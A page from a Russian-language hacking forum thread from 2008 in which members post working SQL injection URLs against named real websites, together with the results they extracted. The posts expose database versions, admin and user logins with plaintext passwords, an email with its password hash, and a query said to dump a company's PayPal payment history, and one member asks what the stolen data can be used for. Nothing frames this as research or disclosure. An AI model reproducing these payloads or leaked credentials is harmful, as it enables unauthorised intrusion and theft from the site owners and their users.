HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 437 из 1602 « Первая < 337387427 433 434 435 436 437 438 439 440 441 4474875379371437 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.01.2008, 14:49
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
www.respectfamily.com - Respect Records Digital (Drum & Bass)
Код:
http://www.respectfamily.com/index.php?mod=members&op=viewmember&id=-41+union+select+0,1,2,3,4+from+members/*
 
Ответить с цитированием

  #2  
Старый 11.01.2008, 15:39
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
theplace.ru

http://www.theplace.ru/news/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5/*

5.0.22/theplace/theplace@localhost


http://www.theplace.ru/news/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password ),5+from+links/*

логин/пароль
baddy13/superior


http://www.theplace.ru/news/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password ),5+from+models/*

логин/пароль
rukzak/rukzak

-------------------------------------------------------------------------

http://stroiru.com/doc_detail.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user())/*

4.0.27/goravtomat_db2/goravtomat_db2@88.214.192.30
-------------------------------------------------------------------------

r-id.ru

http://www.r-id.ru/main/press/news?nid=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1, 1/*

5.0.32-Debian_7etch1-log/rid/rid@localhost



http://www.r-id.ru/main/press/news?nid=-1+union+select+1,concat_ws(0x2F,email,pass),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1+from+u sers+limit+0,1/*.

мейл/хеш
sinyagin@neolant.ru/35560b3d7e41a43aa12c6d01dc9a5131


Админка: http://www.r-id.ru/admin

Логин/пасс для админки:

http://www.r-id.ru/main/press/news?nid=-1+union+select+1,concat_ws(0x2F,toString,pass),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1+fro m+admins/*

RIDadmin/NoStranger
 
Ответить с цитированием

  #3  
Старый 11.01.2008, 15:55
zarkon
Постоянный
Регистрация: 22.11.2006
Сообщений: 473
Провел на форуме:
2461137

Репутация: 216
По умолчанию
вот такой приколяк....

http://www.mg-portal.com.ua/index.php?st=0&lang=0&id=4+AND+1=0+union+select+0, 0,0,concat(char(80),char(114),char(101),char(118), char(101),char(100)),concat(char(89),%20char(97),c har(32),char(103),char(108),char(117),char(107))

а команду выполнит не получилось..
 
Ответить с цитированием

  #4  
Старый 11.01.2008, 18:23
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию
http://www.bluebit.com.au/
Цитата:
http://www.bluebit.com.au/cms.php?id=-1+UNION+SELECT+1,concat_ws(0x3A,id,mc_gross,paymen t_gross,shipping,tax,mc_fee,payment_fee,mc_currenc y,txn_type,payment_date,payment_status,verify_sign ,txn_id,payment_type,receiver_id,item_name,item_nu mber,receipt_id,custID,rawData),3+FROM+bluebitbiz_ bluebit_com_au.ecom_paypal/*
Выводит полную историю PayPal операций конторы. Там они как то софт за 30$ штука продают .
http://www.atcnt.com.au/
Цитата:
http://www.atcnt.com.au/page.php?id=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9,10/*
 
Ответить с цитированием

  #5  
Старый 11.01.2008, 18:24
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию
www.rayner.com

Цитата:
http://www.rayner.com/products.php?id=-22+union+select+1,2,3,table_name,5,6,7,8,9+from+in formation_schema.tables/*
Все таблицы.

Цитата:
http://www.rayner.com/products.php?id=-22+union+select+1,2,3,column_name,5,6,7,8,9+from+i nformation_schema.columns/*
Все поля.
 
Ответить с цитированием

  #6  
Старый 11.01.2008, 18:35
presidentua
Постоянный
Регистрация: 04.11.2007
Сообщений: 331
Провел на форуме:
1724067

Репутация: 806
Отправить сообщение для presidentua с помощью ICQ
Post
love.svadba.net.ru
Цитата:
http://love.svadba.net.ru/ankett.php?id=-10'+union+select+1,2,3,4,pass,id,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+fro m+users/*
в таблице users, такие поля pass,id, email, остальных не подбирал

и есть раскрытие путей:
Notice: Undefined variable: fname in /usr/local/psa/home/vhosts/svadba.net.ru/sub/love/ankett.php on line 7

сильно не рылся,но у них там форум есть большой.
Может кто жену ищет ему это поможет
 
Ответить с цитированием

  #7  
Старый 11.01.2008, 18:40
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию
vip-tur.ru
Код HTML:
http://www.vip-tur.ru/?page=country&id=22+union+select+0,concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
USERIMAFLEX_VIPTUR@LOCALHOST
VERSION:5.0.40
DATABASEIMAFLEX_VIPTUR
Код HTML:
http://www.vip-tur.ru/?page=country&id=22+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.tables/*
- имена всех таблиц
Код HTML:
http://www.vip-tur.ru/?page=country&id=22+union+select+0,column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.columns/*
- имена всех колонок
 
Ответить с цитированием

  #8  
Старый 11.01.2008, 21:04
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию
Код HTML:
http://www.imc.pl.ua/katalog_ssilok.php?show_links=6+union+select+1,2,3,4,5,6,7,concat_ws(0x10a,version(),database(),user())/*
4.1.22-log
imc_imc
imc_imcb@localhost

я туговат в этом деле, но данные достал...

Только не кричите... что возвожно сделать с помощью этой инфы?
 
Ответить с цитированием

  #9  
Старый 11.01.2008, 21:27
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
WuWu, ну к information_schema там доступа нет, значит структуру их базы мы не узнаем. Да и чего там интересного вобще узнавать ? Форума у них нету. Авторизации для юзеров я тоже не нашел.. Не перспективно, имхо ))

---------------------------------------------------------------------------

http://www.jetcharter.ru/new/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6/*

4.0.26/jetcharterru/jetcharterru@62.213.73.13
 
Ответить с цитированием

  #10  
Старый 11.01.2008, 22:15
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию
нашол дырку в статистике сайта... вот, но немогу добраться до структуры!!

Код HTML:
http://www.top.iv-fr.net/stat.php?id=1+UNION+SELECT+1,2,3,4,/*
 
Ответить с цитированием
Ответ
Страница 437 из 1602 « Первая < 337387427 433 434 435 436 437 438 439 440 441 4474875379371437 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ